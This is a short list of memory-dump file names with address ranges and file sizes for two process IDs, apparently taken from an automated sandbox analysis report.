                                                • memory/3684-377-0x00007FFFD9CC0000-0x00007FFFD9CD4000-memory.dmp

                                                  Filesize

                                                  80KB

                                                • memory/3684-376-0x00007FFFCA250000-0x00007FFFCA31D000-memory.dmp

                                                  Filesize

                                                  820KB

                                                • memory/3684-375-0x00007FFFD9D00000-0x00007FFFD9D33000-memory.dmp

                                                  Filesize

                                                  204KB

                                                • memory/3684-374-0x00007FFFDB640000-0x00007FFFDB64D000-memory.dmp

                                                  Filesize

                                                  52KB

                                                • memory/3684-373-0x00007FFFDA150000-0x00007FFFDA169000-memory.dmp

                                                  Filesize

                                                  100KB

                                                • memory/3684-372-0x00007FFFCA990000-0x00007FFFCAB0E000-memory.dmp

                                                  Filesize

                                                  1.5MB

                                                • memory/3684-371-0x00007FFFD9D40000-0x00007FFFD9D63000-memory.dmp

                                                  Filesize

                                                  140KB

                                                • memory/3684-370-0x00007FFFE1360000-0x00007FFFE1379000-memory.dmp

                                                  Filesize

                                                  100KB

                                                • memory/3684-369-0x00007FFFDA270000-0x00007FFFDA29D000-memory.dmp

                                                  Filesize

                                                  180KB

                                                • memory/3684-32-0x00007FFFE37B0000-0x00007FFFE37BF000-memory.dmp

                                                  Filesize

                                                  60KB

                                                • memory/4948-265-0x000002252D290000-0x000002252D298000-memory.dmp

                                                  Filesize

                                                  32KB